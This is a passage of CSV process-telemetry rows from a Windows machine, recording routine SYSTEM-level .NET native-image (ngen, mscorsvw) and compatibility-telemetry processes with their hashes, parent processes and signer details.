+1534,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:16.805607900+00:00,8100,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.778074900+00:00,18012,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:580",True,2021-06-25 00:47:16.557310900+00:00,6108,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:16.865418+00:00,2021-06-25 00:47:39.586030900+00:00,7475f309-3458-4b72-bde6-6ef7aa5b3457,computerpii_0a470890c60768167990033d701e7bd881398861,181747,False,10.7740.19041.1052,False,11540474045178425,,11540474045178427,2021-06-25 00:47:16.778074900+00:00,18012,2021-06-25 00:47:16.778074900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,18012,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-25 00:47:16.777546100+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1535,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:16.813483400+00:00,7472,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.790866400+00:00,5032,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:596",True,2021-06-25 00:47:16.557310900+00:00,6108,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:16.867829200+00:00,2021-06-25 00:47:39.586082500+00:00,39c18caa-d133-4681-9c99-fdc44d2edb6a,computerpii_0a470890c60768167990033d701e7bd881398861,181748,False,10.7740.19041.1052,False,11540474045178426,,11540474045178428,2021-06-25 00:47:16.790866400+00:00,5032,2021-06-25 00:47:16.790866400+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,5032,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-25 00:47:16.825817600+00:00,2021-02-17 04:29:20.532877500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1536,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:16.986813200+00:00,20364,ngen.exe,"""ngen.exe"" RemoveTaskDelayStartTrigger /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.698814400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,174552,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.778074900+00:00,18012,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:580",True,2021-06-25 00:47:16.557310900+00:00,6108,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:17.117196600+00:00,2021-06-25 00:47:39.586476200+00:00,3bab6666-927b-4b9b-83d1-0f038a88ffc4,computerpii_0a470890c60768167990033d701e7bd881398861,181756,False,10.7740.19041.1052,False,11540474045178425,,11540474045178429,2021-06-25 00:47:16.778074900+00:00,18012,2021-06-25 00:47:16.778074900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,18012,18560,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-25 00:47:16.777546100+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1537,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:17.062192100+00:00,2248,ngen.exe,"""ngen.exe"" ExecuteQueuedItems /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.698814400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,174552,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.778074900+00:00,18012,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:580",True,2021-06-25 00:47:16.557310900+00:00,6108,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:17.131603400+00:00,2021-06-25 00:47:39.586524800+00:00,8ea6eecc-ce2c-4d39-b2c0-0537c1baa0fb,computerpii_0a470890c60768167990033d701e7bd881398861,181757,False,10.7740.19041.1052,False,11540474045178425,,11540474045178430,2021-06-25 00:47:16.778074900+00:00,18012,2021-06-25 00:47:16.778074900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,18012,2176,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-25 00:47:16.777546100+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1538,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:17.168893700+00:00,11172,ngen.exe,"""ngen.exe"" RemoveTaskDelayStartTrigger /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.829464400+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,144344,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.790866400+00:00,5032,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:596",True,2021-06-25 00:47:16.557310900+00:00,6108,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:17.266290500+00:00,2021-06-25 00:47:39.586622800+00:00,48139106-8f8d-4b2e-a069-74f046d4eb64,computerpii_0a470890c60768167990033d701e7bd881398861,181759,False,10.7740.19041.1052,False,11540474045178426,,11540474045178431,2021-06-25 00:47:16.790866400+00:00,5032,2021-06-25 00:47:16.790866400+00:00,ngentask.exe,5032,18688,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-25 00:47:16.825817600+00:00,2021-02-17 04:29:20.532877500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1539,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:17.375783700+00:00,20120,ngen.exe,"""ngen.exe"" ExecuteQueuedItems /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.829464400+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,144344,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.790866400+00:00,5032,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:596",True,2021-06-25 00:47:16.557310900+00:00,6108,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:17.442541100+00:00,2021-06-25 00:47:39.586674+00:00,19ac311c-ac65-4c6f-a163-40dc7b1c5852,computerpii_0a470890c60768167990033d701e7bd881398861,181760,False,10.7740.19041.1052,False,11540474045178426,,11540474045178433,2021-06-25 00:47:16.790866400+00:00,5032,2021-06-25 00:47:16.790866400+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,5032,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-25 00:47:16.825817600+00:00,2021-02-17 04:29:20.532877500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1540,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:17.388163700+00:00,9396,CompatTelRunner.exe,CompatTelRunner.exe -m:invagent.dll -f:RunUpdate -cv:2ffD9TS8EEGxTCTh.6,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.591016500+00:00,21124,CompatTelRunner.exe,compattelrunner.exe -maintenance,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:17.443701900+00:00,2021-06-25 00:47:39.586722400+00:00,9519dd40-5d82-4c5d-800b-999dd174c77c,computerpii_0a470890c60768167990033d701e7bd881398861,181761,False,10.7740.19041.1052,False,11540474045178409,,11540474045178434,2021-06-25 00:47:16.591016500+00:00,21124,2021-06-25 00:47:16.591016500+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,21124,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-25 00:47:16.580548+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+1541,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:17.639453200+00:00,2140,ngen.exe,"""ngen.exe"" install ""System.Runtime.WindowsRuntime, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.698814400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,174552,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.778074900+00:00,18012,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:580",True,2021-06-25 00:47:16.557310900+00:00,6108,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:17.672159300+00:00,2021-06-25 00:47:39.586871700+00:00,defcbc65-f201-48aa-83d8-cd14443962f8,computerpii_0a470890c60768167990033d701e7bd881398861,181764,False,10.7740.19041.1052,False,11540474045178425,,11540474045178436,2021-06-25 00:47:16.778074900+00:00,18012,2021-06-25 00:47:16.778074900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,18012,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-25 00:47:16.777546100+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1542,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:17.639992900+00:00,16436,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.829464400+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,144344,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,ae933850c93d3b3001ab21bb65c3efa1,21cfa6bbc96779923e21ca05f14a32ab24cf45eb0c448aa0c4f60b71635924d8,fb4bebba7a1407c6d3931f77fd721cffee78ddd2,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.790866400+00:00,5032,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:596",True,2021-06-25 00:47:16.557310900+00:00,6108,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:17.672258+00:00,2021-06-25 00:47:39.586920500+00:00,b04fb1cc-c266-4770-a33f-200637003e69,computerpii_0a470890c60768167990033d701e7bd881398861,181765,False,10.7740.19041.1052,False,11540474045178426,,11540474045178437,2021-06-25 00:47:16.790866400+00:00,5032,2021-06-25 00:47:16.790866400+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,5032,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,79816,2020-12-02 21:00:19+00:00,2020-12-02 22:45:24+00:00,2021-06-25 00:47:16.825817600+00:00,2021-02-17 04:29:20.532877500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1543,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:17.661409800+00:00,548,mscorsvw.exe,"mscorsvw.exe -StartupEvent 1d4 -InterruptEvent 0 -NGENProcess 1c0 -Pipe 1d0 -Comment ""NGen Worker Process""",PortableExecutable,2021-02-17 04:29:15.807523600+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe,151984,412a3fb0c25743da59375c1e298933ea,da1087ba2641efd77d85e5838aeb6c333e80caa9f24c889fd2de2e0b58f8d1a5,9b3f155d23569a683a1c1059d539a15a0c08093f,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:17.639453200+00:00,2140,ngen.exe,"""ngen.exe"" install ""System.Runtime.WindowsRuntime, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",True,2021-06-25 00:47:16.778074900+00:00,18012,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:17.677643700+00:00,2021-06-25 00:47:39.587018400+00:00,b4b54def-0edb-405f-98d9-f683ad19e913,computerpii_0a470890c60768167990033d701e7bd881398861,181767,False,10.7740.19041.1052,False,11540474045178436,,11540474045178438,2021-06-25 00:47:17.639453200+00:00,2140,2021-06-25 00:47:17.639453200+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,2140,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,174552,2020-12-02 20:58:16+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-25 00:47:17.088795300+00:00,2021-02-17 04:29:15.698814400+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,mscorsvw.exe,mscorsvw.exe,.NET Runtime Optimization Service
+1544,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:17.757990+00:00,21360,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",PortableExecutable,2021-02-17 04:29:15.698814400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe,174552,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,3142937610966b092ca8886c76a3b113,ff70c1b71440e34931eb8ef97236f3cb2bb2668c72e7a3338660ced5c0753af8,ea8ff42f1d5346532a42bc345dd25652ba63a850,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:16.778074900+00:00,18012,ngentask.exe,"""NGenTask.exe"" /RuntimeWide /StopEvent:580",True,2021-06-25 00:47:16.557310900+00:00,6108,\Device\HarddiskVolume3\Windows\System32\taskhostw.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:17.788466900+00:00,2021-06-25 00:47:39.587614800+00:00,66492ac8-2daa-4eae-ba38-66a3afa48589,computerpii_0a470890c60768167990033d701e7bd881398861,181777,False,10.7740.19041.1052,False,11540474045178425,,11540474045178439,2021-06-25 00:47:16.778074900+00:00,18012,2021-06-25 00:47:16.778074900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe,18012,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,79312,2020-12-02 20:58:24+00:00,2020-12-02 22:38:14.543933300+00:00,2021-06-25 00:47:16.777546100+00:00,2021-02-17 04:29:20.504956500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,NGenTask.exe,NGenTask.exe,Microsoft .NET Framework optimization service,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler
+1545,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:17.778973200+00:00,7404,mscorsvw.exe,"mscorsvw.exe -StartupEvent 218 -InterruptEvent 0 -NGENProcess 208 -Pipe 214 -Comment ""NGen Worker Process""",PortableExecutable,2021-02-17 04:29:15.864371200+00:00,C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe,125872,d7365b80e8951ddc95f3a8e3ac01d37d,3e5099f573601926e59862fba2495974688e72677c73f10e4c99e26a76cdcf37,0636347981cb05b74859ce7c841753da90ce679a,417d6ea61c097f8df6fef2a57f9692df,d0105566bc22ef92204e163428e5feda866f8a9b2be19be3b95e6327fff3f8c6,ed27c605f1d2df6de1c5489930bfea2059631727,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:17.639992900+00:00,16436,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",True,2021-06-25 00:47:16.790866400+00:00,5032,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:47:17.790332400+00:00,2021-06-25 00:47:39.587663600+00:00,368914f0-22cd-4fc2-ad01-32485d221f85,computerpii_0a470890c60768167990033d701e7bd881398861,181778,False,10.7740.19041.1052,False,11540474045178437,,11540474045178440,2021-06-25 00:47:17.639992900+00:00,16436,2021-06-25 00:47:17.639992900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe,16436,16512,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework\v4.0.30319,144344,2020-12-02 21:00:07+00:00,2020-12-02 22:45:24+00:00,2021-06-25 00:47:17.226815800+00:00,2021-02-17 04:29:15.829464400+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,ngen.exe,ngen.exe,Microsoft Common Language Runtime native compiler,Microsoft Corporation,Microsoft® .NET Framework,4.8.4320.0,mscorsvw.exe,mscorsvw.exe,.NET Runtime Optimization Service
+1546,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:47:17.894507900+00:00,2080,mscorsvw.exe,"mscorsvw.exe -StartupEvent 1bc -InterruptEvent 0 -NGENProcess 1a8 -Pipe 1b8 -Comment ""NGen Worker Process""",PortableExecutable,2021-02-17 04:29:15.807523600+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe,151984,412a3fb0c25743da59375c1e298933ea,da1087ba2641efd77d85e5838aeb6c333e80caa9f24c889fd2de2e0b58f8d1a5,9b3f155d23569a683a1c1059d539a15a0c08093f,b6c3fe33b436e5006514403824f17c66,a446d35f5e60bdae1a7117b71d90abb0fea424ee416b0e0ecd2c485dc5939a68,0b114d7f811369adee66b40f4056aeac4827d05e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 00:47:17.757990+00:00,21360,ngen.exe,"""ngen.exe"" install ""System.Core, Version=Ipv4PII_faa44d24386a8cffa231607659363f61062dbbca, Culture=neutral, PublicKeyToken=b77a5c561934e089"" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior",True,2021-06-25 